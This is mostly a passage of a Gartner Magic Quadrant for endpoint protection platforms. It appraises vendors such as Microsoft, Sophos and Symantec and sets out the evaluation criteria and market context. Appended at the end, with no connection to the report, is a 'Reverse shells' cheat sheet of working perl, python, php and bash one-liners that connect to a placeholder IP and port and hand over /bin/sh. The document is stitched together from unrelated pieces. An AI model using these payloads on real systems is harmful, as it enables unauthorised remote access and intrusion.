Microsoft is unique in the EPP space, as it is the only vendor with the capacity to embed protection features directly into the OS. It has used this advantage to step up its efforts in security with Windows 10 features, improvements to Windows Defender (also known as System Center Endpoint Protection), the addition of Windows Defender Advanced Threat Protection and Windows Defender Security Center.
Windows 10 OS-level features and capabilities available with Windows Enterprise E3 and E5, such as Application Guard, AppLocker, Secure Boot, Device Guard, Exploit Guard, Advanced Threat Protection (ATP) and Credential Guard, significantly improve protection against current common threats. However, these protections are not as integrated in previous OS versions.
Overall, Microsoft now provides a broad range of security protections that address a wide spectrum of threats across endpoint, Office 365 and email. The comprehensive solution set will resonate with most organizations’ security requirements, provided their budget stretches to the higher-tier, E5-level subscription.
Microsoft has become the most-asked-about vendor during EPP-related Gartner client inquiry calls, and there is significant interest in using the security capabilities in Windows 10 to reduce security spend with other vendors.
Strengths
  • Over the past two years, Microsoft has made steady improvements in the security solutions available as part of Windows 10. A deployment of Windows Defender with Defender ATP can be considered directly competitive with some of the EPP solutions available from other vendors noted in this research.
  • Windows Defender provides file-based protection using signatures and heuristics, along with cloud look-ups to detect newer malware. The cloud look-ups and cloud-based ML have dramatically improved Microsoft’s detection accuracy in test results. Defender in Windows 10 will step up to protect clients automatically if a third-party EPP engine fails, is out of date or is disabled.
  • Microsoft’s EDR solution, Defender ATP, leverages Microsoft’s own Azure infrastructure offering to store six months of endpoint data at no extra charge.
  • Microsoft’s Windows Security Research Team benefits from a vast installation of over 1 billion consumer endpoint versions of the antivirus engine and its online system-check utilities, which provide a petri dish of malware samples and IOAs.
Cautions
  • The biggest challenge continues to be the scattered security controls, management servers, reporting engines and dashboards. Microsoft is beginning to center its future management and reporting around the Windows Defender Security Center platform, which is the management interface for the whole Windows Defender suite, including ATP. Microsoft Intune is replacing System Center as the primary management tool.
  • To access advanced security capabilities, organizations need to sign up for the E5 tier subscription, which clients report as being more expensive than competitive EPP and EDR offerings, reducing the solution set’s overall appeal.
  • Microsoft relies on third-party vendors to provide malware prevention, EDR and other functionality on non-Windows platforms, which may lead to disparate visibility and remediation capabilities and additional operational complexities.
  • The advanced security capabilities are only available when organizations migrate to Windows 10. Microsoft does much less to address all other Windows platforms currently in operation.

Palo Alto Networks

Palo Alto Networks is still best-known to Gartner clients for its next-generation firewall (NGFW) product line, and this continues to be the main line of introduction to Palo Alto Networks Traps for Gartner clients.
Traps uses a stack of nonsignature detection capabilities, such as ML, static and dynamic analysis, as well as monitoring processes and applications as they are spawned for suspicious activity and events. Suspect files from the endpoint can be tested by Palo Alto Networks WildFire, its cloud-based threat analysis and malware sandboxing platform, which is included with a Traps subscription.
Palo Alto Networks acquired LightCyber in 2017; its behavioral-based analytics technology provides automated detection of suspicious user and entity activity indicative of malware. Traps without LightCyber currently offers limited EDR capabilities, which impacts its execution and vision evaluation in this assessment.
Gartner clients will find Palo Alto Networks Traps most appealing when it can integrate with an existing Palo Alto Networks NGFW deployment.
Strengths
  • Organizations with existing Palo Alto Networks NGFW devices will be good candidates for an integrated deployment.
  • Traps does not rely on signature updates, and although it does use the WildFire platform to perform fast look-ups by file hash, it is able to block malware/ransomware when offline or disconnected from the internet.
  • Traps provides solid exploit prevention and mitigation, which is useful for organizations with a difficult patch management process.
  • There are strong integrations with orchestration and SOC automation vendors such as Splunk, ServiceNow and Phantom.
Cautions
  • There is currently no cloud-based management option; customers must use an on-premises management server.
  • While Traps collects endpoint forensics data, it does not provide any response capabilities or postevent remediation tools. Organizations that do not use a Palo Alto Networks NGFW will need to take a multivendor approach to gain these capabilities.
  • Traps lacks EDR capabilities beyond simple IOC searching, making investigation hard without an additional product.
  • Palo Alto Networks acquired LightCyber in early 2017, but has not yet used the technology to improve the limited detection and response capabilities in Traps.
  • Traps displayed a high rate of false positives in AV-TEST testing between August and October 2017.

Panda Security

Panda Security’s unique value proposition is the classification or attestation of every single executable file and process on a protected endpoint device, and it is the only vendor to include a managed threat hunting service in the base purchase of its EPP. Adaptive Defense 360 is fully cloud managed, and combines EPP and EDR into a single offering and single agent.
The attestation service implements an automatic application whitelisting model, where only trusted and approved applications and processes are able to execute. By offloading the classification and authorization process to the vendor, organizations will have a much better deployment success rate than trying to deploy a manual application control solution.
Panda Security’s cloud-first approach, and the managed services backing the EPP and EDR capabilities, are beginning to increase brand awareness outside of Europe.
Organizations without experienced security staff will find Panda Security a good shortlist candidate for an EPP solution, as will organizations considering managed detection and response solutions that are prepared to replace their incumbent EPP vendor.
Strengths
  • The 100% attestation service can drastically reduce the threat surface of endpoints.
  • Due to the classification of all executable processes, Panda Security is able to provide detailed information on vulnerable versions of applications that are present in the environment.
  • Panda Security’s Adaptive Defense platform was one of the first to combine endpoint protection features with managed EDR capabilities.
  • The price point is extremely attractive when buyers consider the capabilities and managed services that are included.
Cautions
  • The macOS agent is limited to signature-based malware detection, and does not integrate with EDR capabilities, leaving a visibility gap for many organizations.
  • Mind share is still weak across the EPP marketplace, which results in limited RFI/RFP presence within the Gartner client base.
  • File and process classification requires access to Panda’s cloud platform. Administrators will need to decide how to handle an endpoint without internet access: either run unclassified executables (albeit scanned and monitored for known IOAs) or block them until connectivity to Panda is restored.
  • An application control and application whitelisting approach is not suitable for all types of user roles. For example, developers who regularly run and test new software builds locally will need exceptions, and adding exceptions will reduce the overall security benefit of this approach.

SentinelOne

SentinelOne is a part of the new wave of EPP solution providers that have experienced fast growth over the past few years. The cloud-based solution is designed around fully embedded EDR and behavioral protection. SentinelOne was one of the first vendors to offer a ransomware protection guarantee based on its behavioral detection and file journaling features. In 2017, SentinelOne struggled to maintain its mind share and share-of-voice in a crowded market, which impacts the marketing-related assessment criteria across both vision and execution. However, the vendor continued to sign on a broad range of partners and resellers.
SentinelOne is a good prospect to replace or augment existing EPP solutions for any organization looking for a solution with strong protection and visibility.
Strengths
  • SentinelOne’s single agent design provides fully integrated file and advanced behavioral anti-malware, based on its EDR functionality.
  • The management console, including full EDR event recording, can be deployed as cloud-based or an on-premises or hybrid approach, easing installation and increasing scalability.
  • SentinelOne offers endpoint visibility (Windows, Linux, macOS and VDI) for investigative information in real time, and an API to integrate common-format, IOC-based threat feeds.
  • SentinelOne leverages volume shadow copy snapshots to return an endpoint to a previously known good state.
Cautions
  • The most significant challenge that SentinelOne faced in 2017 was the churn in staff roles across product, sales, marketing, and other internal and client-facing groups. Gartner clients reported inconsistent interactions with SentinelOne throughout the year. This negatively impacts on its execution and vision in this assessment.
  • SentinelOne does not offer application whitelisting or leverage the use of sandboxing for suspicious file analysis (local, network or cloud).
  • While SentinelOne offers broad platform support, not all platforms provide the same level of capabilities or response options, which can lead to disparities in overall protection and workflow.
  • Larger organizations with advanced SOCs will find the management console lacking in visibility and workflow capabilities.

Sophos

In March 2017, Sophos acquired Invincea — a Visionary vendor in the 2017 Magic Quadrant for Endpoint Protection Platforms — giving Sophos access to its deep learning ML algorithms.
The Sophos Intercept X product, designed to protect against and recover from the malicious actions related to ransomware and exploits, proved popular with both existing Sophos Endpoint Protection customers and as an augmentation to an incumbent EPP. This momentum continued its increased brand awareness in the enterprise space.
Also included in the Intercept X purchase are Sophos’ EDR-like capabilities — called Root Cause Analysis — and the ML malware detection technology from the acquisition of Invincea was added in late 2017.
Sophos’ cloud-based EPP with the Intercept X platform is a good fit for organizations that can take advantage of a cloud-based administration platform, and that value strong protection against ransomware and exploit-based attacks over advanced forensic investigation capabilities.
Strengths
  • Intercept X clients report strong confidence in not only protecting against most ransomware, but also the ability to roll back the changes made by a ransomware process that escapes protection.
  • Intercept X is available as a stand-alone agent for organizations that are unable to fully migrate from their incumbent EPP vendor.
  • The exploit prevention capabilities focus on the tools, techniques and procedures that are common in many modern attacks, such as credential theft through Mimikatz.
  • The Sophos Central cloud-based administration console can also manage other aspects of the vendor’s security platform, from a single console, including disk encryption, server protection, firewall, email and web gateways.
  • Root Cause Analysis provides a simple workflow for case management and investigation for suspicious or malicious events.
  • Root Cause Analysis capabilities are available on macOS, along with protection against cryptographic malware.
Cautions
  • Although we credited Sophos for a cloud-first approach last year, it has now made parts of Intercept X available for on-premises customers. This is likely to hamper cloud adoption and extend the time that Sophos manages and maintains separate protection stacks.
  • Root Cause Analysis is not available in Intercept X for clients that use the on-premises version of Sophos Endpoint Protection.
  • Sophos’ primary improvement was the integration of Invincea’s deep learning technology. Beyond that, there has been little in the way of enhancements to the EDR capabilities of the Sophos Endpoint Protection platform in the last 12 months.
  • Sophos does not provide vulnerability reporting; rather, it relies on its mitigation and blocking technologies, so organizations will need to find other ways to prioritize their patch management program.

Symantec

The divestiture of the Veritas business in January 2016 and the acquisition of Blue Coat in August 2016 provided a new executive team with leadership and vision that has refocused the vendor and resulted in an improved execution score in this analysis. In 2017, Symantec successfully released product updates for its traditional products with enhancements and new capabilities, such as deception technologies. In the EDR space, Symantec is the most successful of the traditional EPP vendors, where the Advanced Threat Protection (ATP) product uses the same agent as Symantec Endpoint Protection (SEP).
Throughout 2017, Symantec continued to be the leading vendor mentioned by other vendors as their main competition. Symantec continues to generate growth and increased revenue in both the consumer and enterprise businesses (roughly evenly split 50/50). It continues to lead the market in EPP revenue and market share.
Symantec continues to provide one of the most comprehensive EPPs available in this market, with third-party test scores remaining in the top tier, and has added advanced features to better address the changing threat landscape, becoming the first vendor to combine malware protection, EDR, system hardening and deception capabilities in a single agent.
Symantec has begun the process of migrating its offerings to a cloud-first model, with a hybrid option available to clients that prefer to maintain some of the management capabilities on-premises.
Strengths
  • Symantec appears to have found a stable footing, with its management team bringing stability across the company.
  • SEP 14 and, most recently, SEP 14.1 have proven to be very stable and efficient on resources. Clients report that the addition of ML and other advanced anti-malware capabilities has improved threat and malicious software detection, and containment.
  • Symantec ATP, its EDR-focused solution, provides good capabilities for detection and response, and existing SEP customers will benefit from its use of the existing SEP agent.
  • Symantec has started to embrace a cloud-first strategy with the introduction of its latest product updates, including SEP Cloud and EDR Cloud, which provide a cloud-based console with feature parity to the on-premises management console.
  • Symantec’s broad deployment across a very large deployment population of both consumer and business endpoints provides it with a very wide view into the threat landscape across many verticals.
Cautions
  • When compared with other vendors in the EPP market, Symantec is still perceived as more complex and resource-intensive to manage.
  • Although Symantec has gained strong traction with its EDR components, the vendor struggles to effectively message the benefits of its single agent approach. Many Gartner clients that use SEP and desire EDR capabilities are initially unaware of the availability of Symantec ATP.
  • Symantec offers a full managed service and managed SOC, which are only attractive when an organization wishes to offload its entire SIEM capability to the vendor. The larger scope of its Managed Security Services (MSS) is expensive when compared to other options from newer vendors that focus on a narrower set of services or features.
  • Symantec customers continue to report inconsistent support experiences, even when large organizations are provided with dedicated support personnel. Symantec customers also reported poor client/account manager communication.

Trend Micro

Trend Micro is the third-largest vendor in the EPP market, with products ranging across network, data center and endpoint systems. It has a large worldwide footprint, with more than half of the business coming from Japan and the Americas.
Although the vendor has had a rather unremarkable year from a technology innovation perspective, it ticks boxes for mainstream EPP requirements, particularly for those looking for a comprehensive suite of solutions at an affordable price. Unlike the more visionary participants in this Magic Quadrant, Trend Micro’s EDR solution is delivered as a separate agent from the EPP solution. And while it integrates with additional on-premises products like the Deep Discovery sandbox, it lacks integration with its cloud sandbox, and cannot be managed from Trend Micro’s cloud platform.
One of Trend Micro’s biggest advantages is the vulnerability assessment and virtual patching technology, which uses an IPS engine to detect vulnerabilities, and uses HIPS to create a virtual patch to block the exploitation.
Trend Micro remains a good shortlist candidate for organizations of all sizes.
Strengths
  • Trend Micro participates in a wide range of third-party tests, with good results overall, and the OfficeScan client delivers functionality that other traditional vendors provide in their separate EDR add-on, such as IOA-driven behavioral detection.
  • The virtual patching capabilities can reduce pressure on IT operational teams, allowing them to adhere to a strategic patch management strategy without compromising on security.
  • For customers looking for a single strategic vendor, Trend Micro has strong integration across the endpoint, gateway and network solutions to enable real-time policy updates and posture adjustments.
  • Trend Micro offers managed detection and response services, in its Advanced Threat Assessment Service, to augment the technology with expert analysis and best practices.
Cautions
  • EPP and advanced EDR capabilities such as process visualization for investigation and threat hunting are delivered by separate agents.
  • Although the cloud management and on-premises management consoles for the OfficeScan EPP agent are identical, some organizations may need to continue with on-premises management if they wish to use functions beyond the base EPP, such as EDR.
  • Although more than 50% of its installed base is running the latest product release, a number of Trend Micro customers reporting poor malware detection told Gartner they were unaware of the availability of new products or new capabilities. This is not unique to Trend Micro; it is common across the larger, traditional vendors.
  • There is no macOS support for EDR, leaving a visibility gap for most organizations.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

  • Cisco (AMP for Endpoints)
  • Endgame
  • Fortinet (FortiClient)
  • FireEye (HX Series and Helix)

Dropped

The following vendors appeared in the 2017 Gartner Magic Quadrant for Endpoint Protection Platforms but were not included in this research, due to their specific focus on single segments:
  • 360 Enterprise Security Group. One of the best-known brands of endpoint security in China, 360 Enterprise Security Group provides endpoint protection and other security suite solutions — including web gateway, data loss prevention, and mobile threat defense — that are compliant with Chinese government policy and are good choices for organizations based in China. 
  • AhnLab. With a very large SMB installed base within South Korea, and serving some very large enterprises, AhnLab focuses on the Korean, Japanese, Chinese and other Asia/Pacific markets with endpoint protection, mobile security and data loss prevention.
  • G Data Software. G Data Software is a popular vendor in the DACH region (Germany, Switzerland and Austria) that offers a suite of solutions including endpoint, web gateway and email. Its location and compliance with German data protection regulations provides a “No Backdoor Guarantee” for its solution, and the processing of telemetry takes place solely in Germany. Customers report reliable, local language customer service as a key part of their purchasing decision. 
  • Webroot. Webroot primarily focuses on delivering capabilities to managed service providers and channel partners, which use Webroot as part of a managed service offering including endpoint security, network security, security awareness training and threat intelligence services. Webroot’s technology is embedded in a number of other security vendors’ solutions. 

Inclusion and Exclusion Criteria

Inclusion in this Magic Quadrant was limited to vendors that met these minimum criteria:
  • The majority of detection events must be from the vendor’s own detection technique, and designed, owned and maintained by the vendor itself. Augmenting with an OEM engine is acceptable, provided it is not the primary method of detection.
  • The vendor’s nonconsumer EPP must have participated in independent, well-known, public tests for accuracy and effectiveness within the 12 months prior to 18 November 2017, or be a current participant in the VirusTotal public interface. Examples include Virus Bulletin, AV-TEST, AV-Comparatives, NSS Labs and SE Labs.
  • The vendor must have more than five named accounts larger than 10,000 seats that use the vendor’s EPP as their sole EPP.
  • The vendor must have a minimum of 500,000 deployed licenses, protecting nonconsumer endpoints, with at least 50,000 of those licenses protecting nonconsumer endpoints within North America.
  • The vendor must satisfy at least 12 of the following “Basic” capabilities, and at least four of the following “Desirable” capabilities:
    • Basic capabilities:
      • Blocks known and unknown file-based malware, without relying on daily signature distribution
      • Detects suspicious and malicious activity based on the behavior of a process
      • Implements protection for common application vulnerabilities and memory exploit techniques
      • Can perform static, on-demand malware detection scans of folders, drives or devices such as USB drives
      • Suspicious event data can be stored in a centralized location, for retrospective IOC/IOA searching/analysis
      • Allows real-time IOC/IOA searching across all endpoints (e.g., file hash, source/destination IP, registry key)
      • Allows remote quarantining of an endpoint, restricting network access to only the EPP management server
      • Automatically updates policies, controls, and new agent/engine versions without connecting directly to the corporate network
      • Continues to collect suspicious event data when outside of the corporate network
      • Detections and alerts include severity and confidence indicators, to aid in prioritization
      • Provides risk-prioritized views based on confidence of the verdict and severity of the incident
      • Displays full process tree, to identify how processes were spawned, for an actionable root cause analysis
      • Automatically quarantines malicious files
      • Identifies changes made by malware, and provides the recommended remediation steps
      • Detects, blocks, and reports attempts to disable or remove the EPP agent
    • Desirable capabilities:
      • Primary EPP console uses a cloud-based, SaaS-style, multitenant infrastructure, and is operated, managed and maintained by the vendor
      • Implements vulnerability shielding (aka virtual patching) for known vulnerabilities in the OS and for non-OS applications
      • Can implement default-deny whitelisting with a vendor maintained “app store”-type approach, and user self-service features
      • Can implement application isolation, to separate untrusted applications from the rest of the system
      • Includes access to a cloud or network-based sandbox that is VM-evasion-aware
      • Includes deception capabilities designed to expose an attacker
      • Vendor itself offers managed detection services, alerting customers to suspicious activity
      • Vendor itself offers managed threat hunting, or managed IOC/IOA searching, for detecting the existence of threats (not via third party or channel)
      • Supports advanced natural-language queries with operators and thresholds (e.g., “Show all machines with new PE >1 week old AND on <2% of Machines OR Unknown”)
      • Provides guided analysis and remediation based on intelligence gathered by the vendor (e.g., “85% of organizations follow these steps”)
      • Provides attribution information and potential motivations behind attacks
      • Can utilize third-party, community and intelligence feeds
      • Allows remote remediation via the management console
      • Includes APIs for integration with SOAR/orchestration for automation

Evaluation Criteria

Ability to Execute

The key Ability to Execute criteria used to evaluate vendors were Product or Service, Overall Viability and Market Responsiveness/Record. The following criteria were evaluated for their contributions to the vertical dimension of the Magic Quadrant:
  • Product or Service: We evaluated the protection and capabilities of the product used by the majority of a vendor’s installed base, and the ability of the vendor to provide timely improvements to its customers. 
  • Overall Viability: This includes an assessment of the financial resources of the company as a whole, moderated by how strategic the EPP business is to the overall company. 
  • Sales Execution/Pricing: We evaluated vendors based on satisfaction with their technical training, sales incentives, marketing and product quality, and on their price and packaging strategy relative to other vendors in the market.
  • Market Responsiveness/Record: We evaluated vendors by their market share in total customer seats under license, and their performance relative to the market and other vendors. 
  • Marketing Execution: We evaluated vendors based on self-reported growth rates in seats under license as a percentage of overall new seat growth for the market, and on the execution of marketing initiatives driving brand awareness and customer satisfaction. 
  • Customer Experience: We evaluated vendors based on reference customers’ satisfaction scores as reported to us in an online survey, and through data collected over the course of over 2,100 endpoint-security-related Gartner client interactions, and through Gartner Peer Insights. 
  • Operations: We evaluated vendors’ resources dedicated to malware research and product R&D, as well as the experience and focus of the executive team. 

Table 1: Ability to Execute Evaluation Criteria

Evaluation Criteria              Weighting
Product or Service               High
Overall Viability                High
Sales Execution/Pricing          Medium
Market Responsiveness/Record     High
Marketing Execution              Medium
Customer Experience              High
Operations                       Medium

Source: Gartner (January 2018)

Completeness of Vision

The key Completeness of Vision criteria in this analysis were Market Understanding and the sum of the weighted Offering (Product) Strategy scores:
  • Market Understanding: This describes the degree to which vendors understand current and future customer requirements, and have a timely roadmap to provide this functionality. 
  • Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements. 
  • Offering (Product) Strategy: When evaluating vendors’ product offerings, we looked for an approach to product development and delivery that emphasizes market differentiation, functionality, methodology and features as they map to current and future requirements. 
    • Anti-malware protection and detection capabilities: This is the quality, quantity, accuracy and ease of administration of an EPP’s anti-malware technology. It covers the tools required to block file-based malware attacks, detect and prevent fileless malware attacks, and mitigate the risk of OS and application vulnerabilities. We look at test results from various independent testing organizations and data from VirusTotal, and use Gartner client inquiries as guides to the effectiveness of these techniques and implementations against modern malware. 
    • Management capabilities: This is the provision of a centralized, role-centric console or dashboard that enhances the real-time visibility of an organization’s endpoint security state. It provides clearly prioritized alerts and warnings, and provides intuitive administration workflows. Vendors that have delivered a cloud-first model with feature parity to an on-premises management platform are given extra credit, as organizations struggle to maintain visibility and control over endpoints in use by the increasing remote workforce. 
    • Incident prevention and investigation capabilities: This includes the discovery, reporting and prioritization of vulnerabilities present in the environment. We look for vendors that provide educated guidance for customers to investigate incidents, remediate malware infections and provide clear root cause analysis, helping reduce the attack surface. Vendors that focus on lowering the knowledge and skills barrier through guided response tools, and easy-to-understand-and-use user interfaces, are given extra credit here.
    • Operational IT: Vendors committed to reducing their customers’ attack surface do so with risk-based, prioritized security state assessments — highlighting known vulnerabilities and misconfigurations. We look for vendors that help their customers understand weaknesses in security posture and process, and those that help audit and measure the impact of security investments. 
    • Supported platforms: Several vendors focus solely on Windows endpoints, but the advanced solutions can also support macOS with near parity on the features delivered in both clients, notably in the activity and event monitoring areas of EDR. 
  • Innovation: We evaluated vendor responses to the changing nature of customer demands. We accounted for how vendors reacted to new threats, invested in R&D and/or pursued a targeted acquisition strategy. 
  • Geographic Strategy: We evaluated each vendor’s ability to support global customers, as well as the number of languages supported. 

Table 2: Completeness of Vision Evaluation Criteria

Evaluation Criteria              Weighting
Market Understanding             High
Marketing Strategy               Medium
Sales Strategy                   Not Rated
Offering (Product) Strategy      High
Business Model                   Not Rated
Vertical/Industry Strategy       Not Rated
Innovation                       Medium
Geographic Strategy              Low

Source: Gartner (January 2018)

Quadrant Descriptions

Leaders

Leaders demonstrate balanced and consistent progress and effort in all execution and vision categories. They have broad capabilities in advanced malware protection, and proven management capabilities for large enterprise accounts. However, a leading vendor isn’t a default choice for every buyer, and clients should not assume that they must buy only from vendors in the Leaders quadrant. Some clients believe that Leaders are spreading their efforts too thinly and aren’t pursuing clients’ special needs. Leaders tend to be more cautious and only gradually react to the market when Visionaries challenge the status quo.

Challengers

Challengers have solid anti-malware products, and solid detection and response capabilities that can address the security needs of the mass market. They also have stronger sales and visibility, which add up to a higher execution than Niche Players offer. Challengers are often one or two core capabilities short, or lack a fully converged strategy, which affects their completeness of vision when compared to the Leaders. They are solid, efficient and expedient choices.

Visionaries

Visionaries deliver in the leading-edge features — such as cloud management, managed features and services, enhanced detection or protection capabilities, and strong incident response workflows — that will be significant in the next generation of products, and will give buyers early access to improved security and management. Visionaries can affect the course of technological developments in the market, but they haven’t yet demonstrated consistent execution. Clients pick Visionaries for best-of-breed features.

Niche Players

Niche Players offer solid anti-malware solutions, and basic EDR capabilities, but rarely lead the market in features or function. Some are niche because they service a very specific geographic region or customer size, while some focus on delivering excellence in a specific method or combination of protection capabilities. Niche Players can be a good choice for conservative organizations in supported regions, or for organizations looking to deploy an augmentation to an existing EPP for a “defense in depth” approach.

Context

In the past 12 months, EPP solutions have continued on track to consume features from the EDR market, and some of the traditionally pure-play EDR vendors have continued to bolster their solutions with protection capabilities more often found in EPP (see “Market Guide for Endpoint Detection and Response Solutions”).
This trend of playing catch-up from two directions has resulted in a slew of vendors with similar capabilities and with little to differentiate themselves.
Those that do differentiate do so with managed features backed by automation and human analysts; a focus on cloud-first management and reporting, and improving the operational side of IT with a focus on vulnerability protection and reporting; and, most importantly, pushing full-stack protection for EPP and EDR use cases to organizations of all sizes.
The new wave of endpoint security vendors was previously considered by risk-averse buyers as complementary to, rather than direct replacements for, traditional EPP. This year, however, Visionary vendors are now gaining traction across all market segments. Although these new-wave vendors attempt to position themselves at a premium price when compared with the renewal costs of a traditional vendor, the sheer volume of vendors in the space makes it a buyer’s market. Heavy discounting is apparent, especially with traditional vendors keen to keep their installed base, and with new-wave vendors that have investors and venture capital firms to please.
Gartner clients should look to vendors that have faster development cycles, providing quicker responses to changing attack trends, and delivering smaller updates that do not need a full uninstall and reinstall. Regardless, organizations should endeavor to upgrade to the latest version as soon as practical; we recommend a minor version upgrade within three months and a major version upgrade within six months.

Market Overview

Testing, Transparency and Evaluation

Malware attacks in early 2017 were seminal to the increased scrutiny on security vendors by the media, independent researchers, and customers and prospects. Gartner’s endpoint protection analyst team received hundreds of inquiries driven by media stories, showing that vendor-client trust is a huge part of any buying decision.
As with previous Magic Quadrants, this year’s inclusion criteria mandate that vendors must have participated in public, independent testing during 2017. Gartner is disappointed with several vendors’ weak participation in standardized tests. There are legitimate complaints about current testing methods and scenarios; however, short of an organization putting a red team together to perform custom-made penetration testing, these tests remain the best indicators of effectiveness, and can be a useful data point to compare trends and performance over time in the same test framework.
Participating in independent tests by AV-Comparatives, AV-TEST, Virus Bulletin and other platforms with public interfaces like VirusTotal demonstrates not only that the products are fit for purpose, but also that the vendor is comfortable with and committed to engaging in a more transparent industry. It’s worth noting that many vendors, from traditional to the new wave, are embracing the shift to a more open community. Solutions from vendors without a long-term commitment to engagement and transparency should be approached with caution.
When evaluating a security solution, it is critical to understand which areas an organization is currently over- or underinvested in. Gartner provides a simple framework in the Adaptive Security Architecture, which many vendors use to communicate their value and feature set in a simple way. Other frameworks exist for more technical evaluations, and the MITRE ATT&CK framework, in particular, is growing in popularity as a way to understand which distinct attack techniques an EPP can prevent or detect.

EPP, EDR and IT Operations

Successful attacks still make use of known vulnerabilities and weaknesses in an organization’s security policy and device configuration. Even the most damaging and high-profile attacks in 2017 (WannaCry and NotPetya) could have been mitigated or the impact reduced by better IT operations, and by better education and communication from security vendors to their customers. Organizations that suffered despite their growing investment in strong endpoint security capabilities felt let down by their vendors. Many of these clients were dissatisfied when their request for help in recovering was met with, “Well, you should have deployed a patch.” These clients asked Gartner, “If these weaknesses were common knowledge, why didn’t our vendor warn us when they have a presence on all our endpoints?”
The most visionary and leading of vendors in 2018 and 2019 will be those that use the data collected from their EDR capabilities to deliver actionable guidance and advice that is tailored to their clients. Detecting known IOCs and suspicious behavior is only one side of the EPP coin — solutions must detect and proactively alert on weaknesses or vulnerabilities that are being exploited right now, or are likely to be exploited in the future.
The fast-moving nature of attacker tools, techniques and procedures means that an organization’s endpoint security strategy must be continually assessed and adapted (see “Use a CARTA Strategic Approach to Embrace Digital Business Opportunities in an Era of Advanced Threats”).
Organizations that are approaching renewal for their incumbent EPP should appraise their current security posture. For example:
  • How effective is our patch management strategy, and do our EPP controls protect against the misuse of vulnerable applications?
  • How fast is our time to resolution of alerts and incidents?
  • Will our staffing level — and the experience of those employees — allow us to take advantage of advanced tools to deliver stronger security capabilities?
  • Should we make a short-term, tactical investment in additional managed services, or switch to a vendor that can provide on-demand managed assistance when we need it?
With a better understanding of their current state, organizations can make educated purchasing decisions, based on the features and capabilities that make a difference to them and their security posture. Gartner clients can use the Adaptive Security Architecture framework to assess their capabilities within the protection, detection, response and prediction phases (see “Designing an Adaptive Security Architecture for Protection From Advanced Attacks”).

Evidence

  • Gartner responded to more than 2,100 client inquiries.
  • Gartner conducted an online survey of 129 EPP reference customers in 4Q17.
  • Gartner conducted an online survey of 55 EPP channel references in 4Q17.

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria. 
Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products. 
Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel. 
Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness. 
Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities. 
Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on. 
Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis. 

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision. 
Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements. 
Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base. 
Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements. 
Business Model: The soundness and logic of the vendor’s underlying business proposition. 
Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets. 
Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes. 
Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.

Reverse shells

1.  perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2.  perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3.  perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'<IP>:<PORT>');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"


python reverse shell (recommended)

1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

To get full terminal support, import the pty module and spawn a shell with the command below:

python -c 'import pty; pty.spawn("/bin/sh")'

php reverse shell

1. php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
2. php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
3. php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
4. php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
5. php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

bash reverse shell

1. bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

